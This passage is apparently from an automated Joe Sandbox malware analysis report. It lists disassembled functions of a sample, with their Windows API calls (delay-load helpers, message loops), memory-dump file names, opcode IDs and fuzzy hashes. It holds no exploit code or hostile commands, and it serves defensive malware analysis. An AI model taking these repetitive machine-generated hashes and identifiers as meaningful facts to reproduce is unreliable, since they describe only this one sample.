                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0
                                                                                      • Opcode ID: dbcd1c53a21abc35dc6e448362e4e88013c482f8a56566ffd26d8742712da74f
                                                                                      • Instruction ID: ce54b454ad704a3cb8d42b2c0147650ad2bd07e4ea00fe25e2b1469e50348282
                                                                                      • Opcode Fuzzy Hash: dbcd1c53a21abc35dc6e448362e4e88013c482f8a56566ffd26d8742712da74f
                                                                                      • Instruction Fuzzy Hash: 5FD01232031240958E790E385D29066AA619B433A6B3CDAE4E06DC40A1E722C843F551
                                                                                      Function 00D8BF77 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D8BF9C
                                                                                        • Part of subcall function 00D8991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D8992F
                                                                                        • Part of subcall function 00D8991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D89940
                                                                                        • Part of subcall function 00D8991E: TranslateMessage.USER32(?), ref: 00D8994A
                                                                                        • Part of subcall function 00D8991E: DispatchMessageW.USER32(?), ref: 00D89954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchItemPeekSendTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4142818094-0
                                                                                      • Opcode ID: 646f1b4e6b3f10567c2920ed1f51509e6cefdc73aadb111a0e96b02156015773
                                                                                      • Instruction ID: 905c30c93b2cf25aa30e5289a6b952b1558773607d93e6e3823b4d72f7d35dc1
                                                                                      • Opcode Fuzzy Hash: 646f1b4e6b3f10567c2920ed1f51509e6cefdc73aadb111a0e96b02156015773
                                                                                      • Instruction Fuzzy Hash: D5D09E32144301EAD6113B51CD06F1ABAA2FB8CB04F004A58B284740B1C6629D30EB32
                                                                                      Function 00D8C7C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 56c32fef0abab804ad4231ee43e33fa4836654294402f756f4f0ba7db26d5148
                                                                                      • Instruction ID: 65660d52748c95765ac5b59fbc44367a2563ab03cd8d88a72835b75e52b13029
                                                                                      • Opcode Fuzzy Hash: 56c32fef0abab804ad4231ee43e33fa4836654294402f756f4f0ba7db26d5148
                                                                                      • Instruction Fuzzy Hash: EFB012912BD002ED3148F2089D02D37010DC0C2B10330D51FF841C1340E9944C5D9236
                                                                                      Function 00D8C787 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 2eded0b64ca0776c40088182a90b4e26b282bac7e7e3b2243a80d99150d11727
                                                                                      • Instruction ID: 7c0c4cbc39349cc10071c0bba226fc8f32541ab72b0e1d149a4c6320fca1ed79
                                                                                      • Opcode Fuzzy Hash: 2eded0b64ca0776c40088182a90b4e26b282bac7e7e3b2243a80d99150d11727
                                                                                      • Instruction Fuzzy Hash: 03B01291279102FD3148B2045C42C37010DC0C3B10330D51FFC41C0240EA904C5C9136
                                                                                      Function 00D8C7B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c4462cf333744aff496f6ce34c03739914bbf8627dd1b240013270dc1c735595
                                                                                      • Instruction ID: c96af21de2e0ec2aea80e3af0f993566472b8a62af5b0e51ccb7e9654ca3a9d4
                                                                                      • Opcode Fuzzy Hash: c4462cf333744aff496f6ce34c03739914bbf8627dd1b240013270dc1c735595
                                                                                      • Instruction Fuzzy Hash: CDB01291279105ED3188F3095C02D37110CD0C2B10330D51FF840C0340E9A04C58933A
                                                                                      Function 00D8C75F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 74b8b9cc17004f03e95a0e14bab18eb78fa4d7f2511e368b09412b9029852df5
                                                                                      • Instruction ID: 6dbf796c5c0a2573ec390f61ec58bc7235209ab50fdc78606b23bec2b8e275fc
                                                                                      • Opcode Fuzzy Hash: 74b8b9cc17004f03e95a0e14bab18eb78fa4d7f2511e368b09412b9029852df5
                                                                                      • Instruction Fuzzy Hash: 71B01292279201ED3148F3587F02D37014CC0C2F10330551FF800C0240F9544C059732
                                                                                      Function 00D8C74B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 3ad0c7c185a6ef0814fe0047962ca8344151506b8f015047b45f485f9b35bc61
                                                                                      • Instruction ID: 717c2cdbff16ffd6e6162027173867edd4d3c2e332f8ed2602e6e0d046275df3
                                                                                      • Opcode Fuzzy Hash: 3ad0c7c185a6ef0814fe0047962ca8344151506b8f015047b45f485f9b35bc61
                                                                                      • Instruction Fuzzy Hash: 2FB01292279101EC3248F3582D02D37014CC0C2F10330951FFC00C0240E9504C049732
                                                                                      Function 00D8C741 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 1d98e65b5426c5585bbfeb509851c88ec7ffe5f103a9424c203f9c8a1daa0d93
                                                                                      • Instruction ID: 6a91d7ecb355f7b7fc33b1651af45e2f6c9c5ccb40a8090b233dd0c5d531abec
                                                                                      • Opcode Fuzzy Hash: 1d98e65b5426c5585bbfeb509851c88ec7ffe5f103a9424c203f9c8a1daa0d93
                                                                                      • Instruction Fuzzy Hash: 02B01292379001EC3188F2586D02D37014CD0C2F14330561FF801C0240EA504C049336
                                                                                      Function 00D8C726 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: d03d36e0b9a8c1c7dc5ed11ad563e4b81776657c36f53a26fbd2b18caf833bcb
                                                                                      • Instruction ID: 6f6cae154681a6d9befddd3cdd43022a56af76d597b360bbd9bebfd2c7c8c605
                                                                                      • Opcode Fuzzy Hash: d03d36e0b9a8c1c7dc5ed11ad563e4b81776657c36f53a26fbd2b18caf833bcb
                                                                                      • Instruction Fuzzy Hash: 8CB012A2279201FC3508B3942D42D37010CC0C2F20330561FF800D4140EA605C44D736
                                                                                      Function 00D8C782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: b4ea3682c61a9e2d1d3b23c5bfc5de40bddfaf38bd9ad756a79676ccc167ab81
                                                                                      • Instruction ID: f0651cc80da7228c612517e568b97bc8cc1752129692e076a9af74a527ffb13a
                                                                                      • Opcode Fuzzy Hash: b4ea3682c61a9e2d1d3b23c5bfc5de40bddfaf38bd9ad756a79676ccc167ab81
                                                                                      • Instruction Fuzzy Hash: 98A011A22BA002FC3008B2A02C02C3B020CC0C2F20330A80EF80280080A8A008082230
                                                                                      Function 00D8C7B1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 2bee0bd5f08856cd7e44367e701105ed072cca16bf567114fa47ef14541a8c87
                                                                                      • Instruction ID: cb8dff0c7e4114dac9aba1e5d7e314260cca9d4cdf12487c0d44e2abd69018d4
                                                                                      • Opcode Fuzzy Hash: 2bee0bd5f08856cd7e44367e701105ed072cca16bf567114fa47ef14541a8c87
                                                                                      • Instruction Fuzzy Hash: 1EA011A22BA002FC3008B200AC02C3B020CC0C2B20330A80EF88280280A8A00CA8A238
                                                                                      Function 00D8C7A7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c434bf5f52eea27d1a36bf596577a52e6b122b1dc10d801802e0f7f840865fa8
                                                                                      • Instruction ID: cb8dff0c7e4114dac9aba1e5d7e314260cca9d4cdf12487c0d44e2abd69018d4
                                                                                      • Opcode Fuzzy Hash: c434bf5f52eea27d1a36bf596577a52e6b122b1dc10d801802e0f7f840865fa8
                                                                                      • Instruction Fuzzy Hash: 1EA011A22BA002FC3008B200AC02C3B020CC0C2B20330A80EF88280280A8A00CA8A238
                                                                                      Function 00D8C75A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 67123bace5fb62bdc1fc7055d11ed760fa87543977a1db2d1b4d40ef362875a9
                                                                                      • Instruction ID: f0651cc80da7228c612517e568b97bc8cc1752129692e076a9af74a527ffb13a
                                                                                      • Opcode Fuzzy Hash: 67123bace5fb62bdc1fc7055d11ed760fa87543977a1db2d1b4d40ef362875a9
                                                                                      • Instruction Fuzzy Hash: 98A011A22BA002FC3008B2A02C02C3B020CC0C2F20330A80EF80280080A8A008082230
                                                                                      Function 00D8C778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
